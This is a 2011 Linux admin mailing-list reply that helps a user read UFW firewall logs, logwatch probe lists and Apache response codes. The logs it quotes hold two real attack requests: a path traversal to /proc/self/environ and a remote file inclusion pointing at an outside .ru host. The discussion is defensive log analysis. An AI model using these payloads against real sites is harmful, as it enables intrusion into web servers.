- To: linux-admin <linux-admin@xxxxxxxxxxxxxxx>
- Subject: Re: UFW logging
- From: terry white <twhite@xxxxxxxxxx>
- Date: Tue, 20 Dec 2011 10:30:31 -0800 (PST)
- In-reply-to: <LB95C01C20EFD4ab49E771871DAC54AB0.1324389799.earth.sciencephoto.co.uk@MHS>
... ciao:
: on "12-20-2011" "Dermot Paikkos" writ:
: I have thousands of entries in my logwatch reports:
this from an hourly "Active System Attack Alerts" report.
"Dec 17 20:14:47 aniota kernel: Packet log: input REJECT ppp0 PROTO=6
218.53.151.177:6000 63.225.163.145:1433 L=40 S=0x00 I=256 F=0x0000
T=106 SYN (#8)
as a general rule, size of these reports tends to suggest how active,
system breach attempts, are. typically, 10K was seen as notable, lately,
i'm seeing 40-80K per hour. t`would seem the natives are restless.
: A total of 5711 sites probed the server
: 1.152.198.116
: 1.22.185.5
: 1.23.105.130
: 1.38.24.232
: 1.38.25.24
: 1.39.95.219
: 1.53.101.185
: 101.108.239.43
:
: I'm not sure what the above probes are.
that, if complete, tells you where the probes initiated. i have a vt
running "lynx" pointed at arin to do arin, ripe, lookups. for instance:
re: 1.152.198.116
"Network
NetRange 1.0.0.0 - 1.255.255.255
CIDR 1.0.0.0/8
Name APNIC-1
Handle NET-1-0-0-0-1
Parent
Net Type Allocated to APNIC" from 'arin';
"inetnum: 1.128.0.0 - 1.159.255.255
netname: TELSTRAINTERNET49-AU
descr: Telstra
descr: Level 12, 242 Exhibition St
descr: Melbourne
descr: VIC 3000
country: AU" from "apnic".
: I also have several entries like this:
: A total of 4 possible successful probes were detected (the following
: URLs contain strings that match one or more of a listing of strings that
: indicate a possible exploit):
:
: /images/?option=com_sectionex&controller=../../../../../../../../../../.
: ./../..//proc/self/environ%0000 HTTP Response 200
: I believe these are php exploits.
the "HTTP Response 200", on the surface of it, is troublesome.
HOWEVER, the http (apache) logs are a more telling indicator of what served
up.
"217.26.127.140 - - [20/Dec/2011:01:43:57 -0800] "GET
//wp-content/plugins/rekt-slideshow/picsize.php?
src=http://blogger.com.1mmt.ru/flash/a.gif.php
HTTP/1.1" 404 356"
here the "HTTP/1.1" 404" means the reqyest was not satisfied.
error codes are your friend.
: To help secure the server, I installed UFW, enabled and allowed HTTP,
: HTTPS and SSH. I then monitored the logs to see what was happening. What
: I am not clear on is what service the log entries below refer to.
:
: Dec 20 13:10:35 myserver kernel: [4808284.769172] [UFW BLOCK]
: IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00
: SRC=194.27.44.2 DST=217.222.0.x LEN=52 TOS=0x00 PREC=0x00 TTL=109
: ID=10243 DF PROTO=TCP SPT=6565 DPT=80 WINDOW=4320 RES=0x00 ACK FIN
: URGP=0
"PROTO=TCP SPT=6565 DPT=80"
'DPT=80' is the "destination port", YOU.
from "/etc/services"
"# service-name port/protocol [aliases ...] [# comment]
http 80/tcp www www-http # WorldWideWeb HTTP
http 80/udp www www-http # HTTP"
so, here we are seeing 'http' processed, however, i am not convinced it
being blocked at all. from your supplied rules, looks like http wide open
...
: Chain ufw-user-input (1 references)
: pkts bytes target
: 29164 1620981 ACCEPT tcp dpt:80 /* 'dapp_Apache' */
--
... it's not what you see ,
but in stead , notice ...
--
To unsubscribe from this list: send the line "unsubscribe linux-admin" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
[Linux Newbie]
[Audio]
[Hams]
[Kernel Newbies]
[Util Linux NG]
[Security]
[Netfilter]
[Bugtraq]
[Photo]
[Yosemite Photos]
[Yosemite News]
[MIPS Linux]
[ARM Linux]
[Linux Security]
[Linux RAID]
[Linux Device Drivers]
[Samba]
[Video 4 Linux]
[Git]
[Linux Resources]
[Fedora Users]
